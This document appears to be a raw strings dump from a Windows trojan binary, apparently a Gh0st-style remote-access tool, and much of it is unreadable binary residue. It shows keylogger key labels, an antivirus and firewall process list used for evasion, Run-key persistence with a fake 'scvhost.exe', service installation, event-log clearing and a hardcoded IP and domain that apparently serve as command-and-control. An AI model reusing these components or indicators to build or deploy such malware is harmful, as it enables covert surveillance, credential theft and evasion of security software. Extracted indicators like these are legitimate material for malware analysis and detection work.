!This program cannot be run in DOS mode.
Rich~C
`.rdata
@.data
@.reloc
<>\u/V
VVVRVP
u4WWWWh
SVWhDd
SVWhDd
QQSVWd
uTVWh2
PPPPPPPP
VC20XC00U
t=MOC
HtHu4j
t*=RCC
;7|G;p
tR99u2
^SSSSS
t"SS9] u
;t$,v-
UQPXY]Y[
HHtXHHt
?If90t
j@j ^V
URPQQh
<+t"<-t
+t HHt
PPPPPPPP
bad buffer
bad Allocate
\Tencent\Users\*.*
SeShutdownPrivilege
{4D36E972-E325-11CE-BFC1-08002BE10318}
SysFreeString
Oleaut32.dll
CoCreateInstance
CoUninitialize
CoInitialize
Ole32.dll
Default
GetCurrentProcess
IsWow64Process
kernel32.dll
Process32Next
Process32First
CreateToolhelp32Snapshot
BaiduSdSvc.exe
ServUDaemon.exe
DUB.exe
1433.exe
pfw.exe
MPMon.exe
FYFireWall.exe
kpfwtray.exe
rfwmain.exe
Outpost Firewall
outpost.exe
Comodo
cpf.exe
Kaspersky
avp.exee
ZoneAlarm
vsmon.exe
F-Prot AntiVirus
F-PROT.exe
Avira Antivir
avgaurd.exe
Mcafee
Dr.web
spidernt.exe
AVG Anti-Virus
avg.exe
Symantec Norton
ccapp.exe
AVK.exe
ananwidget.exe
AST.exe
adam.exe
GG.exe
TrojanHunter.exe
KSWebShield.exe
beikesan.exe
parmor.exe
safedog.exe
FortiTray.exe
remupd.exe
vsserv.exe
F-Secure
fsavgui.exe
Sophos
SavProgress.exe
mssecess.exe
QUICK HEAL
QUHLPSVC.EXE
ccSetMgr.exe
avgwdsvc.exe
V3Svc.exe
patray.exe
AYAgent.aye
Miner.exe
QQPCRTP.exe
ksafe.exe
rtvscan.exe
ashDisp.exe
Avira(
avcenter.exe
TMBMSRV.exe
knsdtray.exe
kxetray.exe
egui.exe
RavMonD.exe
KvMonXP.exe
avp.exe
f-secure.exe
QQ.exe
Norton
ccSvcHst.exe
SBAMSvc.exe
Microsoft Security Essentials
MsMpEng.exe
BKavService.exe
SpywareTerminator
SpywareTerminatorShield.exe
nProtect
nspupsvc.exe
PSafeSysTray.exe
Immunet
iptray.exe
ArcaVir
ArcaTasksService.exe
VIRUSfighter
AVWatchService.exe
Shield Antivirus
CKSoftShiedAntivirus4.exe
UnThreat
UnThreat.exe
K7TSecurity.exe
CMCTrayIcon.exe
F-PROT
F-PROT.EXE
Coranti2012
CorantiControlCenter32.exe
Mongoosa
MongoosaGUI.exe
vba32lder.exe
The Cleaner
cleaner8.exe
Lavasoft
ad-watch.exe
a-squared
a2guard.exe
360sd.exe
360tray.exe
Mcshield.exe
RtlGetNtVersionNumbers
HARDWARE\DESCRIPTION\System\CentralProcessor\0
%s:%d:%s
%s\%d.bak
Description
SYSTEM\CurrentControlSet\Services\
Kernel32.dll
WTSGetActiveConsoleSessionId
WinSta0\Default
CreateEnvironmentBlock
userenv.dll
%s Win7
> nul
/c del
COMSPEC
KERNEL32.dll
[Pause Break]
[Shift]
[CLEAR]
[BACKSPACE]
[DELETE]
[INSERT]
[Num Lock]
[Down]
[Right]
[Left]
[PageDown]
[Delete]
[PageUp]
[Home]
[Insert]
[Scroll Lock]
[Print Screen]
[CTRL]
[Enter]
:]%d-%d-%d %d:%d:%d
<Enter>
<BackSpace>
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\Program Files\Common Files\scvhost.exe
CTXOPConntion_Class
CloseProxy
System
Security
Application
%s\shell\open\command
Applications\iexplore.exe\shell\open\command
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
MSIE 6.0
InternetOpenA
wininet.dll
SYSTEM\Clore
/c del
IsBadReadPtr
GetCurrentThreadId
CloseDesktop
SetThreadDesktop
GetUserObjectInformationA
GetThreadDesktop
user32.dll
OpenDesktopA
OpenInputDesktop
GetLastError
LookupPrivilegeValueA
AdjustTokenPrivileges
OpenProcessToken
ADVAPI32.dll
RegCloseKey
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryValueExA
RegDeleteValueA
RegDeleteKeyA
RegSetValueExA
RegCreateKeyExA
bad allocation
CorExitProcess
Unknown exception
bad exception
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
(null)
`h````
xpxxxx
UTF-16LE
UNICODE
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
`h`hhh
xppwpp
1#QNAN
1#SNAN
WSAIoctl
WS2_32.dll
SHGetSpecialFolderPathA
SHChangeNotify
ShellExecuteExA
ShellExecuteA
SHELL32.dll
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegQueryValueExA
RegOpenKeyA
CloseServiceHandle
RegSetValueExA
StartServiceA
OpenServiceA
UnlockServiceDatabase
ChangeServiceConfig2A
LockServiceDatabase
CreateServiceA
OpenSCManagerA
RegOpenKeyExA
SetServiceStatus
CreateProcessAsUserA
SetTokenInformation
DuplicateTokenEx
RegisterServiceCtrlHandlerA
StartServiceCtrlDispatcherA
CloseEventLog
ClearEventLogA
OpenEventLogA
DeleteService
ADVAPI32.dll
VirtualFree
VirtualAlloc
CreateEventA
WaitForSingleObject
SetEvent
InterlockedExchange
CancelIo
CloseHandle
ResetEvent
GlobalUnlock
GlobalLock
FindNextFileA
FindFirstFileA
GetCurrentProcess
GetVersion
WriteFile
DeviceIoControl
CreateFileA
SetLastError
LocalFree
GetLastError
GlobalAlloc
LocalAlloc
ReadFile
GetFileSize
GetSystemDirectoryA
DeleteFileA
FreeLibrary
GetProcAddress
LoadLibraryA
GetSystemInfo
lstrlenA
lstrcpyA
lstrcatA
lstrcmpiA
LoadLibraryW
GetTickCount
GetDiskFreeSpaceExA
GetDriveTypeA
GlobalMemoryStatusEx
GetVersionExA
GetLocalTime
CreateDirectoryA
ReleaseMutex
CreateMutexA
MoveFileExA
MoveFileA
GetModuleFileNameA
SetFileAttributesA
CopyFileA
ExpandEnvironmentStringsA
SetThreadPriority
GetCurrentThread
SetPriorityClass
GetEnvironmentVariableA
GetShortPathNameA
DefineDosDeviceA
GetFileAttributesA
ExitProcess
GetCurrentThreadId
SetFilePointer
CreateProcessA
TerminateThread
ResumeThread
VirtualProtect
HeapFree
GetProcessHeap
HeapAlloc
KERNEL32.dll
CloseClipboard
GetClipboardData
OpenClipboard
ExitWindowsEx
SetClipboardData
EmptyClipboard
wsprintfA
GetLastInputInfo
GetMessageA
PostThreadMessageA
GetInputState
GetWindowTextA
GetForegroundWindow
GetAsyncKeyState
GetKeyState
GetWindow
GetClassNameA
FindWindowA
MessageBoxA
SendMessageA
IsWindowVisible
EnumWindows
USER32.dll
SetupDiDestroyDeviceInfoList
SetupDiCallClassInstaller
SetupDiSetClassInstallParamsA
SetupDiGetDeviceRegistryPropertyA
SetupDiEnumDeviceInfo
SetupDiGetClassDevsA
SETUPAPI.dll
GetIfTable
IPHLPAPI.DLL
RtlUnwind
RaiseException
GetModuleHandleW
DecodePointer
HeapReAlloc
ExitThread
CreateThread
GetCommandLineA
EncodePointer
IsProcessorFeaturePresent
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetStdHandle
GetModuleFileNameW
HeapCreate
HeapDestroy
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
VirtualQuery
SetHandleCount
GetFileType
GetStartupInfoW
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
GetStringTypeW
GetConsoleCP
GetConsoleMode
SetStdHandle
FlushFileBuffers
WriteConsoleW
CreateFileW
Xy.dll
fuckyou
.?AVCBuffer@@
.?AVCClientSocket@@
.?AVCChatManager@@
.?AVCManager@@
.?AVCKeyboardManager@@
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
www.jinjin.com
216.83.59.17
Default
Rsowwi ukgcocae
SSDKSRV Discovery Service
Booth
%ProgramFiles%\
Terms.exe
FUCK YOU
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVCKernelManager@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
3-364Y4
5*545>5
566T6m6
8D:O:Y:d:
>.>7>@>F>L>U>^>
?Z?`?h?q?{?
1 1&191@1I1Q1u1
5)5E5d5
6Z6`6r6
6)70787?7G7R7]7i7}7
9<9G9Q9[9e9o9y9
:#:-:7:A:K:U:_:i:s:}:
;';1;;;E;O;Y;c;m;};
<'<1<;<E<O<Y<c<m<w<
=!=+=5=?=I=S=]=g=q={=
>%>/>9>I>S>]>g>q>{>
?%?,?3?:?A?H?O?T?i?p?w?~?
0D0M0g0
3$353K3R3\3l3r3
3-4[4g4n4z4
4,5A5N5\5i5
8#8*868L8
9$9Z9t9y9
:>:K:U:
;3;D;V;[;
<%=1=:=G=
=A>K>V>`>
0#0*040E0K0U0_0d0p0t0x0|0
1&1+10191T1
22+262O2^2c2j2v2
4,474>4P4}4
4!5;5P5W5]5k5
8!8N8]8b8
9)9W9`9e9o9
: :%:j:p:
;2;@;J;P;V;w;
<<<d<q<
0(1.1Y1t1
5>5E5L5X5]5g5t5
;9;?;E;g;
<+<:<O<s<
$0.040=0h0
191R1X1e1r1x1
2&2D2_2
555M5k5
5)6[6o6
6;7d7h7l7p7t7x7|7
8(939F9\9b9
>$>+>u>
0U1i1p1|1
2"2(2]2c2i2p2x2
4'424:4B4
6 6$6v6{6
7b7i7s7
84888<8@8D8H8L8w8
9V9[9a9e9k9o9u9y9
;9;_;};
= =$=(=,=0=4=8=<=
2%2+2?2a2
2P3V3_3f3
4#4(4:4D4I4e4o4
5'5M5T5n5u5
71777F7
8 8[8c8x8
9*:\:t:{:
; ;j;p;t;x;|;
4"4,4N4
4+5_5e5k5
1(1.171=1R1X1c1o1u1}1
4,424>4D4T4Z4`4o4}4
5 5&5+5:5P5V5^5c5k5p5x5}5
6M6X6^6
7/8<8B8
9%9/9A9X9f9l9
;!;);p;u;
;;<D<J<
=7>>>K>Q>
00=0Q0W0
2(3@3J3e3m3s3
5"6_6v6
718>8H8V8_8i8
<$<)<8<_<
>M?g?x?
90:D:L:Z:h:o:
<:=A=M>
:A:K:c:
<8=>=X=g=t=
>">H>{>
>!?'?Q?
0.0F0d0
1!161V1{1
2f4o4{4
5-5<5t5~5
7F8L8h8
89,989@9H9T9}9
1%101<1A1Q1V1\1b1x1
12*202@2E2V2^2d2n2t2~2
34365=5C5f5
::1:C:U:{:
;/;A;S;y=
7 748R8
9":O:Z:
:;);x;
;P<V<`<
0W1]1k1
;L>P>T>X>\>`>d>h>l>p>t>x>
<J=Y?f?t?
d0j0w0
034383<3H3L3`3d3
6@6D6H6L6,?4?<?D?L?T?\?d?l?t?|?
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
6 686H6L6\6`6d6l6
7(7,70787P7T7l7|7
8,8<8@8P8T8d8h8l8t8
8$949X9d9l9
:8:@:H:P:T:\:p:x:
;(;4;<;X;h;x;
<$<(<H<h<p<t<
=,=0=L=P=X=`=h=l=t=
>8>X>x>
?8?X?d?
040D0T0p0
0,7H7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
5 5$5(5,5054585<5@5D5H5L5P5`5d5h5l5p5t5x5|5
: :$:(:,:0:4:8:<:@:D:H:P:
jjjjjj
jjjjjj
jjjjjj
jjjjjj
FriendlyName
ntdll.dll
mscoree.dll
KERNEL32.DLL
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
n(null)
WUSER32.DLL
((((( H
h(((( H
H
CONOUT$